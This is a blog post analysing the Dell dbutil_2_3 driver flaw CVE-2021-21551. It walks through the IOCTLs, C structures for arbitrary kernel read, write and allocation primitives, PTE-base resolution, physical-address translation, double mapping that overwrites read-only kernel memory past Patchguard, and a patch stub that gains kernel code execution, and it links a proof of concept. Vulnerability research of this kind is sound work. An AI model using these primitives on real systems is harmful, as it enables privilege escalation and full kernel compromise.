A Dell: CVE-2021-21551

Earlier this month, a post written by SentinelLabs came about notifying of a Dell driver having multiple vulnerabilities. Vulnerabilities in third party drivers always get exciting because of all the evil stuff one can cause with it and to top that, no exploitation is needed and you can still get the same outcome!

The Vulnerability

The vulnerability itself is not extravagant. What makes this driver “vulnerable” is the relaxed DACL dbutil_2_3 contains which isn’t bad in and of itself.

As an aside, a DACL is a discretionary access control list that contains access control entries, or ACEs. An ACE will determine whether or not a particular group or user can interact with that object. In this case, an ACE is present that allows the Everyone group to interact with dbutil_2_3.

There are several Microsoft drivers that allows for a user, even from within a low integrity environment, to interact with it such as afd.sys or cng.sys. What makes this scenario dangerous are the functions exposed to the low level user. For example, a low level user should not be able to allocate kernel memory or have the ability read kernel memory. This can help facilitate a sandbox escape if the stars align. Unfortunately Fortunately, none of the IOCTLs provided give a way to leak information on builds post Meltdown. Shame, for sure…hehe.

Behavioral Analysis

dbutil_2_3 has multiple IOCTLs; some of which are interesting and some of which are not. The author mentions of IOCTL 0x9b0c1ec8 giving the capability to write to memory and using that to modify his token’s privileges. After doing a search for that particular IOCTL, it leads to the code block dbutil_2_3+13a2:

It’s a fairly small function, but the basic block that is relevant to what we are most interested in is shown below:

If DL is set to 0, we veer to the path on the right which takes in the source parameter for memmove; otherwise, we veer to the left and and continue down to memmove. The write IOCTL causes us to go right, leaving dl set to zero where we control the source parameter. How does this happen though if there are no instructions that manipulate DL in any way inside this particular function? We need to take a step back and start working backwards to see when exactly this register is first being modified. Shortly after, we see what is happening outside of ReadWritePrimitives:

There are two paths leading up to ReadWritePrimitives and if we follow the first one, we can see that EDX is being set to zero which leads us to the write IOCTL. If you remember, DL is being tested so with critical thinking skills, we can assume that if EDX is set to 1, we will have found our read primitive. We follow the second path that leads to that function and see that 1 is being moved inside DL with IOCTL 0x9b0c1ec4. Does the theory check out?

Perfect. IOCTLs 0x9b0c1ec4 and 0x9b0c1ec8 are responsible for crippling the System’s integrity!

So the two primitives have been identified, but what is needed to interact with it?

If you take a look at the function, you begin to see what’s happening. The first block checks to see if ECX is above or equal to 0x18, or 24, bytes. This is the input and output size. If the sizes are below this, the IRP request will get dropped with the error STATUS_INVALID_PARAMETER. The relevant part of this function that matters most is below:

This will take place for both read and write primitives. After seeing what was going on for the read, I was able to come up with this struct that fit all the necessary requirements that gives me exactly what I am going after:

typedef struct _ARBITRARY_READ_PRIMITIVE
{
    UINT32 Ignored = 0;
    UINT32 NumberOfBytes = 0;
    UINT64 AddressToRead = 0;
    UINT64 OffsetToBeAdded = 0;
    UINT8 Data[1] = { 0 };
} ARBITRARY_READ_PRIMITIVE, * PARBITRARY_READ_PRIMITIVE;

The structure I came up with for the write primitive is just a little bit different from the read, but I achieved what I wanted:

typedef struct _ARBITRARY_WRITE_PRIMITIVE
{
    UINT64 Ignored = 0;
    UINT64 WriteWhere = 0;
    UINT64 OffsetToBeAdded = 0;
    UINT64 WriteWhat = 0;
    UINT32 NumberOfBytes = 0;
} ARBITRARY_WRITE_PRIMITIVE, * PARBITRARY_WRITE_PRIMITIVE;

Can I use this to read and write some random spot in memory??

Perfect.

The read and write primitives have now been created and that’s just two IOCTLs. There are other IOCTLs within this driver — are there any more interesting ones?? As of right now, we have what we need to escalate privileges whether it’s reading the System’s token and stealing it to become System or using the write primitive to modify the privileges on your process’ token and jumping through hoops to get System privileges. Either way, you will be able to achieve privilege escalation whatever route you go. What else can be done though in the context of this driver??

Exploitation Mitigations

The bane of my existence, and for those that actively write kernel exploits, for modern exploitation is Hypervisor Enforce Code Integrity, or HVCI. HVCI will kill arbitrary code execution instantly. It will also kill any allocations that are dynamically allocated instantly. The engineers over at Msft have done a really good job and have outdone themselves at preventing arbitrary code execution! Good job, guys!

As an aside, code execution will be achieved in this post but only because of HVCI not being enabled!

After a little bit of time seeing what this driver is capable of, I came across IOCTL 0x9b0c1ec0. This is perfect because the driver allocates contiguous memory for you in non-paged pool. What does this mean for us? We can dynamically allocate writable memory without risk of red-screening the machine all thanks to Dell for exposing this functionality.

The structure I came up with to allow you to interact with this IOCTL is below:

typedef struct _ARBITRARY_KERNEL_MAPPING
{
    UINT64 Ignored = 0;
    UINT64 NumberOfBytes = 0;
    UINT64 LowestAcceptableAddress = 0;
    UINT64 HighestAcceptableAddress = 0;
    UINT64 AllocatedKernelMemory = 0;
    UINT64 ResolvedPhysicalAddress = 0;
} ARBITRARY_KERNEL_MAPPING, * PARBITRARY_KERNEL_MAPPING;

The interesting thing is the driver gives you both, the virtual address and the physical address of this mapped memory. Look at Dell being the real bro’s (the physical address is not needed anyways for what we’re doing, or going to do for that matter).

Shortly after finding I can map kernel memory, I found another interesting IOCTL that uses MmMapIoSpace: 0x9b0c1f44. The beauty of this is it maps the physical address into virtual space as read, write, and executable! Downside: the implementation unmaps the virtual address immediately after use. The prototype is below:

PVOID MmMapIoSpace(
  PHYSICAL_ADDRESS    PhysicalAddress,
  SIZE_T              NumberOfBytes,
  MEMORY_CACHING_TYPE CacheType
);

The downside to this is that the first parameter of MmMapIoSpace requires the physical address of the virtual address. It used to be where you can map some random value, usually 0x1000, with x amount of bytes and parse that data for either MZ signatures or finding PROC pooltags to steal tokens, or other privileged memory, pre-meltdown era. Now? Not so much after the whole Spectre/Meltdown fiasco; instead, you just red-screen almost immediately due to attempting to read invalid memory. Starting > 1709, you’ll need to forge some type of primitive to get the physical address of a virtual address…but how? We will come back to this one shortly because it plays a key role for exploitation…

Defeating PML4 Randomization

The Page Table Entry, or PTE, holds the page’s flags that determines the permissions of that page, such as:

  1. If it’s present.
  2. If you can read and/or write to it.
  3. The User/Supervisor bit that some of the readers may be familiar with.
  4. If it’s NxE.

These are the ones that are important to us in regards to exploitation in my opinion.

0: kd> uf nt!MiGetPteAddress
nt!MiGetPteAddress:
fffff807`72c22060 48c1e909        shr     rcx,9
fffff807`72c22064 48b8f8ffffff7f000000 mov rax,7FFFFFFFF8h
fffff807`72c2206e 4823c8          and     rcx,rax
fffff807`72c22071 48b80000000080b2ffff mov rax,0FFFF968000000000h
fffff807`72c2207b 4803c1          add     rax,rcx
fffff807`72c2207e c3              ret

It used to be where Msft had hard-coded the PTE base being moved into RAX on line 6. What this meant is an exploit-developer would be able to calculate the PTE of an address remotely. This made it incredibly easy to calculate the address to prepare the environment for exploitation; however, in recent years this is no longer viable due to it being randomized. Msft introduced a security mitigation called PML4 Randomization which kills the ability to calculate the PTE by randomizing it on boot. The PTE base can be found via MiGetPteAddress + 0x13 or by reading MmPteBase:

0: kd> dq nt!MmPteBase l1
fffff801`5c4fa358  ffff9680`00000000

At this point, we can leverage the read primitive to read this value to be able to leak an address’ PTE. My question now is…how can I dynamically resolve MmPteBase without hardcoding offsets in a reliable and efficient manner?

MmGetPteAddress is undocumented so I can’t pull it from GetProcAddress. Same goes for MmPteBase. We can make a signature for it but what if the instruction sets are different on different Windows builds? I cross-referenced MiGetPteAddress to look at all the results that use MmGetPteAddress (spoiler: there’s a lot).

Eventually, I found one that was not only exported but the very first call to it was MiGetPteAddress. That function was MmReturnChargesToLockPagedPool and is shown below:

0: kd> uf MmReturnChargesToLockPagedPool
nt!MmReturnChargesToLockPagedPool:
fffff801`5c0c5670 4053            push    rbx
fffff801`5c0c5672 4883ec60        sub     rsp,60h
fffff801`5c0c5676 488bc1          mov     rax,rcx
fffff801`5c0c5679 488d9aff0f0000  lea     rbx,[rdx+0FFFh]
fffff801`5c0c5680 0f57c0          xorps   xmm0,xmm0
fffff801`5c0c5683 25ff0f0000      and     eax,0FFFh
fffff801`5c0c5688 4803d8          add     rbx,rax
fffff801`5c0c568b 48c1eb0c        shr     rbx,0Ch
fffff801`5c0c568f 0f11442430      movups  xmmword ptr [rsp+30h],xmm0
fffff801`5c0c5694 0f11442440      movups  xmmword ptr [rsp+40h],xmm0
fffff801`5c0c5699 0f11442450      movups  xmmword ptr [rsp+50h],xmm0
fffff801`5c0c569e e8bdc995ff      call    nt!MiGetPteAddress (fffff801`5ba22060)

Perfect.

By resolving MmReturnChargesToLockPagedPool and then reading in MiGetPteAddress at offset 0x13, MmPteBase gets resolved. In case you are wondering, MmPteBase was used but none of the functions it is used by are exported, wamp wamppp. The implementation to dynamically resolve the PTE base is shown below:

--snipped--
FARPROC MmReturnChargesToLockPagedPool = GetProcAddress(
        hModule,
        "MmReturnChargesToLockPagedPool"
    );
    if (MmReturnChargesToLockPagedPool == NULL)
    {
        return false;
    }

    UINT64 mask = 0xffffffff00000000;
    UINT8 value = 0;
    UINT8 i = 0;
    bool bFound = false;

    do
    {
        value = *reinterpret_cast<PUINT8>(
            reinterpret_cast<PUINT8>(MmReturnChargesToLockPagedPool) + i 
            );
        if (value == 0xe8)
        {
            UINT32 offset = *reinterpret_cast<PUINT32>(
                reinterpret_cast<PUINT8>(MmReturnChargesToLockPagedPool) + i + 1
                );
            offset += 5;

            mask |= offset;

            bFound = true;

            break;
        }
        i++;
    } while (value != 0xc3);
--snipped--

This is great and all, but what if I want to do more than just get the PTE of a virtual address or what if the PTE is NULL? (looking at you ntos!) There is an undocumented function that is used from within MmGetPhysicalAddress called MiFillPteHierarchy that does exactly what I want to achieve. Its implementation is MiGetPteAddress 4 times over, consecutively.

0: kd> uf nt!MiFillPteHierarchy
nt!MiFillPteHierarchy:
fffff806`1f0595d0 48c1e909        shr     rcx,9
fffff806`1f0595d4 49b9f8ffffff7f000000 mov r9,7FFFFFFFF8h
fffff806`1f0595de 4923c9          and     rcx,r9
fffff806`1f0595e1 49b8000000000083ffff mov r8,0FFFF830000000000h
fffff806`1f0595eb 498bc0          mov     rax,r8
fffff806`1f0595ee 4803c8          add     rcx,rax
fffff806`1f0595f1 48890a          mov     qword ptr [rdx],rcx
fffff806`1f0595f4 48c1e909        shr     rcx,9
fffff806`1f0595f8 4923c9          and     rcx,r9
fffff806`1f0595fb 498bc0          mov     rax,r8
fffff806`1f0595fe 4803c8          add     rcx,rax
fffff806`1f059601 48894a08        mov     qword ptr [rdx+8],rcx
fffff806`1f059605 48c1e909        shr     rcx,9
fffff806`1f059609 4923c9          and     rcx,r9
fffff806`1f05960c 498bc0          mov     rax,r8
fffff806`1f05960f 4803c8          add     rcx,rax
fffff806`1f059612 48894a10        mov     qword ptr [rdx+10h],rcx
fffff806`1f059616 48c1e909        shr     rcx,9
fffff806`1f05961a 4923c9          and     rcx,r9
fffff806`1f05961d 498bc0          mov     rax,r8
fffff806`1f059620 4803c8          add     rcx,rax
fffff806`1f059623 48894a18        mov     qword ptr [rdx+18h],rcx
fffff806`1f059627 c3              ret

When it comes down to it, I can easily implement the logic of this function to calculate all four levels.

Sick.

There is interesting behavior when leveraging the read primitive to leak the contents of a NULL PTE. What happens is you end up reading the bytes that are located at the virtual address you are trying to read. For example, ntoskrnl does not have a PTE. If you were to try and read the PTE address calculated for ntoskrnl, you will end up reading in the MZ signature. I’m not quite sure if there is a better and more “professional” way to check against the other entries to see if it’s NULL, but this hacky, quick, and filthy implementation works perfectly:

bool DellBiosUtil::isValidPte(UINT64 Source, UINT64 Pte)
{
    UINT64 SourceContents = 0;
    UINT64 PteContents = 0;
    
    if (!Read(Source, &SourceContents))
    {
        return false;
    }

    if (!Read(Pte, &PteContents))
    {
        return false;
    }

    if (SourceContents == PteContents)
    {
        return false;
    }

    return true;
}

As an aside, I’m sure there’s a way to check if a PTE is NULL but this was the easiest way to go without going into fully-fledged programming.

If the PTE is NULL, then the PDE will need to get used. This is no biggie and doesn’t really alter our code at all simply because the flags of the PTE and PDE being one for one, according to the Intel SDM Vol. 3c. Table 4-10.

Defeating Meltdown

As I mentioned before, the moment you start trying to map arbitrary memory, you will red-screen almost instantly due to the meltdown patches. It killed the ability to scan memory for privileged information by almost instantly crashing the system. So what can one do to resolve it’s physical address in a more reliable and efficient manner?

Take a look at the structure of the PTE format baed on the Intel SDM:

typedef union _PAGE_TABLE_ENTRY
{
    struct 
    {
        UINT64 Present : 1;					/// bit 0
        UINT64 ReadWrite : 1;				/// bit 1
        UINT64 UserSupervisor : 1;			/// bit 2
        UINT64 PageLevelWriteThrough : 1;	/// bit 3
        UINT64 PageLevelCacheDisable : 1;	/// bit 4
        UINT64 Accessed : 1;				/// bit 5
        UINT64 Dirty : 1;					/// bit 6
        UINT64 PAT : 1;						/// bit 7
        UINT64 Global : 1;					/// bit 8 
        UINT64 CopyOnWrite : 1;				/// bit 9
        UINT64 Ignored : 2;					/// bits 10 - 11
        UINT64 Pfn : 40;					/// bits 12 - (52 - 1)
        UINT64 Reserved : 11;				/// bits 52 - 62
        UINT64 NxE : 1;						/// bit 63
    } flags;
    UINT64 value = 0;
} PAGE_TABLE_ENTRY, * PPAGE_TABLE_ENTRY;

By reading the PTE, we can retrieve the Page Frame Number, or PFN. This is beautiful because we don’t have to rely on API’s such as MmGetPhysicalAddress or the like. A simple algorithm I came up with to calculate a virtual address’s physical address is below:

UINT64 DellBiosUtil::VirtualToPhysical(UINT64 VirtualAddress, UINT64 index)
{
    VirtualAddress &= 0xfff;
    
    return (index << 12) + VirtualAddress;
}

All this does is mask off the last 12 bits of the address to be added to the PFN. Simple. Elegant. Huge impact. By using the read primitive, we created a simple algorithm to implement a virtual address to physical address translation function which eliminates the need to scan memory and in turn, defeating Meltdown’s protections. With precision I may add 😉

Why go through all the work to satisfy that function if we not only have a read and write primitive, but a function that allocates writable memory for us? Two words: double mapping…

Patching without Patchguard

What if you want to write to something that isn’t writable? For instance, and this is just an example, what if you want to hook something from within ntoskrnl? If you were to write to something in there in its current state, you will red-screen specifically because of us trying to write to read-only memory.

One thing that can be done is to disable Cr0.[wp], write to it, and then re-enable Cr0.[wp]. I, personally, think that is pretty dirty (and I’m always down for dirty) but that can open you up for potential red-screens. One must hope that Patchguard doesn’t catch it at the time of its modification because the machine will red-screen if it is. The better way is to resolve the virtual address’ physical address by reading the virtual address’ PTE and then calculating its physical address using the PFN and offset of that function. Doing it this way eliminates the need to modify the control register and potentially triggering a red-screen due to Patchguard.

Caveat: the area of memory you are overwriting needs to be deemed not critical for Patchguard not to get triggered.

The structure to interact with this IOCTL is below:

typedef struct _ARBITRARY_DOUBLE_MAPPING
{
    UINT64 Ignored = 0;
    UINT64 PhysicalAddress = 0x1000;
    UINT8 Data[1024] = { 0 };
} ARBITRARY_DOUBLE_MAPPING, * PARBITRARY_DOUBLE_MAPPING;

I am going to place a breakpoint write after the memcpy to ensure I do overwrite the MZ signature of ntoskrnl without modifying Cr0.[wp].

Perfect.

So how does this work? This works because MmMapIoSpace is mapping the physical address of Ntoskrnl into virtual space as read/write/execute; essentially re-mapping the virtual address with full read/write permissions. The moment you write to the mapped virtual address, it updates instantaneously. The drivers implementation will then unmap this space immediately after use and will not be usable afterwards.

Sick.

Code Execution

All the necessary ingredients are here to make the perfect exploit:

  1. Allocate memory and write to it if needed.
  2. A read primitive.
  3. A write primitive.
  4. Ability to change the permissions of a page.
  5. Ability to write to read-only memory.

The game plan now is to find a sweet spot from within dbutil_2_3 and patch it to contain my code that way I can just trigger it with an IOCTL. dbutil_2_3 isn’t deemed critical, so patching the driver itself will not cause any issues with Patchguard. The function I chose actually leads to a KeInsertQueueDpc call and since I am not interesting in using that particular function, this one can be a prime candidate. The function is shown below:

The function begins at dbutil_2_3 + 0x1266 and ends at dbutil_2_3 + 0x12b5. This gives me one byte shy of 80 bytes which is more than enough to accomplish anything really and if 80 bytes isn’t enough, extending it is fairly simple to have more space.

The payload will be something simple to demonstrate the overwrite and that is shown below:

const int szSize = 79;

PBYTE patched = new BYTE[szSize];
RtlFillMemory(patched, szSize, 0x90);
RtlFillMemory(patched, 1, 0xcc);

After a successful run, you can see that by reading the PTE of dbutil_2_3 + 0x1266 and leaking its physical address, we can use that to map its physical page into virtual space and write to it with the modified instruction set as shown below:

This is great because now we can execute anything we want. The only limitation is what you can think of! All that is left to do is trigger this path by using IOCTL 0x9b0c1f04.

Perfect.

As of now, the PoC will red-screen the machine and that is because we have completely ruined what the driver is expecting. So how would you go about fixing that? The code blocks below is what comes after that call (I got rid of the junk and only showing the direct path from end of that code block to the end of the function for clarity’s sake):

The most efficient way is to jump to an area that is safe. The code blocks leading to the end of that function all dereference some register either from RSP or RDI. The top three code blocks are not ideal because those registers can, and will, get clobbered once you start introducing meaningful assembly and not just executing a whole bunch of NOPs. The area that is ideal to jump to would be the last function. The IRP will then get passed to IofCompleteRequest and the function will complete with no bugchecks 🙂

The updated code to accomplish this is below:

UINT8 JmpStub[] = {
    0xe9, 0x06, 0x02, 0x00, 0x00
};

const int szSize = 85 + sizeof(JmpStub);

PBYTE patched = new BYTE[szSize];

RtlFillMemory(patched, szSize, 0x90);
RtlFillMemory(patched, 1, 0xcc);

RtlCopyMemory(patched + szSize - sizeof(JmpStub), JmpStub, sizeof(JmpStub));

It is mentioned that a memory corruption exists within the driver as well but since we have constructed pretty strong primitives, there is absolutely no need to exploit a memory corruption with the potential to disrupt the machine if not extremely cautious. After all, we don’t want to raise any red flags if we’re casting spells now do we?? hehe…

Root Cause

The underlying issue is the relaxed DACL dbutil_2_3 has that allows for even a low integrity user to interact with it; however, there is no way for a low integrity user to somehow leak the necessary information to exploit this without the need of a separate vulnerability that utilizes an information disclosure or a memory leak. The only thing a low integrity user would be able to do is crash the system.

Another gotcha is the driver needs to be running for the user to be able to interact with it. From the sounds of it, it looks like the driver will only get registered and started during the update itself and then deleted once it is done updating whatever it is updating. Successful exploitation would need to happen during that time frame. If the driver is on your system but the service is not running, you will not be able to take advantage of this driver. If the service is running, then that’s a different story.

To sum things up, I used five IOCTLs to do pretty hefty damage; one of which allocates writable kernel memory which can be used to easily convert a NxE page into an executable page. I used the read primitive to read the contents of dbutil_2_3’s PTE to calculate the physical address of the target function I wanted to overwrite. I then used MmMapIoSpace to double map dbutil_2_3’s physical address as writable to be able to write instantaneously to it. Lastly, I used the IOCTL that was responsible for queuing DPC threads to trigger arbitrary code execution. If HVCI is enabled, the system will be protected from this type of attack; however, it will not protect you from overwriting anything with the write primitive or reading anything inside kernel memory!

There you have it! Arbitrary code execution.

Nice.

As an aside, everything was tested on Windows Enterprise 20h2 and not on anything else!

You can find the PoC for this instance on Github: https://github.com/ch3rn0byl/CVE-2021-21551

Leave a Reply

Your email address will not be published. Required fields are marked *